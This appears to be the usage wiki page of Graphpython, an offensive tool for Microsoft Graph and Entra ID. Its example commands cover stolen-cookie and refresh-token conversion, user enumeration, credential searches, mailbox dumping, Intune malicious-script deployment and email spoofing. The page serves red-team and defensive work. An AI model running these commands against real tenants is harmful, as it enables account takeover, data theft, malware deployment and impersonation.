-
Notifications
You must be signed in to change notification settings - Fork 14
Usage
mc edited this page Jul 24, 2024
·
22 revisions
This page documents the available arguments and switches for Graphpython.
usage: Graphpython [-h] [--command COMMAND] [--list-commands] [--token TOKEN] [--estsauthcookie ESTSAUTHCOOKIE] [--use-cae] [--cert CERT]
[--domain DOMAIN] [--tenant TENANT] [--username USERNAME] [--secret SECRET] [--id ID] [--select SELECT] [--query QUERY]
[--search SEARCH] [--entity {driveItem,message,chatMessage,site,event}] [--device {Mac,Windows,AndroidMobile,iPhone}]
[--browser {Android,IE,Chrome,Firefox,Edge,Safari}] [--only-return-cookies]
[--mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}] [--top TOP]
[--script SCRIPT] [--email EMAIL]
-
-h, --help- Show the help message and exit
Graphpython -h
-
--command COMMAND- specify the command to execute
Graphpython --command get-currentuser --token token-
--list-commands- list all available commands
Graphpython --list-commands-
--token TOKEN- provide a Microsoft Graph access token or refresh token for FOCI abuse- can either supply the token raw or from a file
Graphpython --command get-user --token eyJ0...
Graphpython --command find-privilegedapplications --token token.txt
Graphpython --command invoke-refreshtoazuremanagementtoken --token <refreshtoken> --tenant <tenantid>-
--estsauthcookie ESTSAUTHCOOKIE- supply 'ESTSAuth' or 'ESTSAuthPersistent' cookie for Invoke-ESTSCookieToAccessToken
Graphpython --command invoke-estscookietoaccesstoken ---estsauthcookie ESTSAUTHPERSISTENT=... --tenant <tenantid> --use-cae
Graphpython --command invoke-estscookietoaccesstoken ---estsauthcookie ESTSAUTH=... --tenant <tenantid> --use-cae-
--use-cae- flag to use Continuous Access Evaluation (CAE) which adds 'cp1' as a client claim to obtain an access token valid for 24 hours. Can be used with the following authentication commands:- Invoke-RefreshToMSGraphToken
- Invoke-RefreshToAzureManagementToken
- Invoke-RefreshToMSTeamsToken
- Invoke-RefreshToOfficeAppsToken
- Invoke-RefreshToOfficeManagementToken
- Invoke-RefreshToOutlookToken
- Invoke-RefreshToSubstrateToken
- Invoke-RefreshToYammerToken
- Invoke-RefreshToOneDriveToken
- Invoke-RefreshToSharePointToken
- Invoke-ESTSCookieToAccessToken
Graphpython --command above> --token <refresh> --tenant <tenantid> --use-cae-
--username USERNAME- provide an email or a file containing user emails for outsider user enumeration
Graphpython --command invoke-userenumerationasoutsider --username [email protected]/users.txt-
--cert CERT- path to an X509Certificate-
.pfxforInvoke-CertToAccessToken -
.crt,.cer, or.pemforAdd-ApplicationCertificate
-
Graphpython --command invoke-certtoaccesstoken --cert certificate.pfx --id <appid> --tenant <tenantid>
Graphpython --command add-applicationcertificate --cert certificate.crt --id <appobjectid> --token token-
--domain DOMAIN- specify the target domain
Graphpython --command invoke-reconasoutsider --domain company.com-
--tenant TENANT- specify the target tenant ID
Graphpython --tenant YOUR_TENANT_ID-
--secret SECRET- enterprise application secret for accessing tokens (used with Invoke-AppSecretToAccessToken` command)
Graphpython --command invoke-appsecrettoaccesstoken --secret YOUR_SECRET --id <appid> --token <token>-
--id ID- ID of the target object
Graphpython --command get-application --id <appid> --token token
Graphpython --command get-user --id [email protected] --token token-
--select SELECT- specify fields to select from the output
Graphpython --command list-recentonedrivefiles --select name,webUrl --token <token>-
--query QUERY- raw API query URL (GET only)
Graphpython --query https://graph.microsoft.com/v1.0/users --token <token>Only used with
Invoke-Search
-
--search SEARCH- search string for querying
Graphpython --command invoke-search --search "password" --entity driveItem --token <token>-
--entity {driveItem,message,chatMessage,site,event}- specify the type of entity to search for:-
driveItem: OneDrive items -
message: Mail messages -
chatMessage: Teams chat messages -
site: SharePoint sites -
event: Calendar events
-
Graphpython --command invoke-search --search "credentials" --entity message --token <token>-
--device {Mac,Windows,AndroidMobile,iPhone}- specify the device type for User-Agent forging
Graphpython --command get-userproperties --device Mac --browser Safari --token <token>-
--browser {Android,IE,Chrome,Firefox,Edge,Safari}- specify the browser type for User-Agent forging
Graphpython --command get-group --browser Edge --device Windows --token <token>-
--only-return-cookies- only return cookies from the request (used with Open-OWAMailboxInBrowser command)
Graphpython --only-return-cookiesOnly used with Dump-OWAMailbox
-
--mail-folder FOLDER- specify the mail folder to dump using the Dump-OWAMailbox command- Allitems
- inbox
- archive
- drafts
- sentitems
- deleteditems
- recoverableitemsdeletions
# displays top 10 emails
Graphpython --command dump-owamailbox --mail-folder inbox --token token --top 10
# dump target user mailbox:
Graphpython --command dump-owamailbox --mail-folder inbox --id <userid/upn> --token <token>-
--top TOP- Number of messages to retrieve (integer) from the mail folder
# displays top 10 emails
Graphpython --command dump-owamailbox --mail-folder inbox --top 10 --token <token>
Graphpython --command dump-owamailbox --mail-folder inbox --id <userid/upn> --top 20 --token <token>-
--script SCRIPT- File containing the script content for Deploy-MaliciousScript or Backdoor-Script
Graphpython --command deploy-maliciousscript --script malicious.ps1 --token <intunetoken>-
--email EMAIL- File containing OWA email message body content for Spoof-OWAEmailMessage
Graphpython --command spoof-owaemailmessage [--id <userid to spoof>] --email email-body.txt --token <token>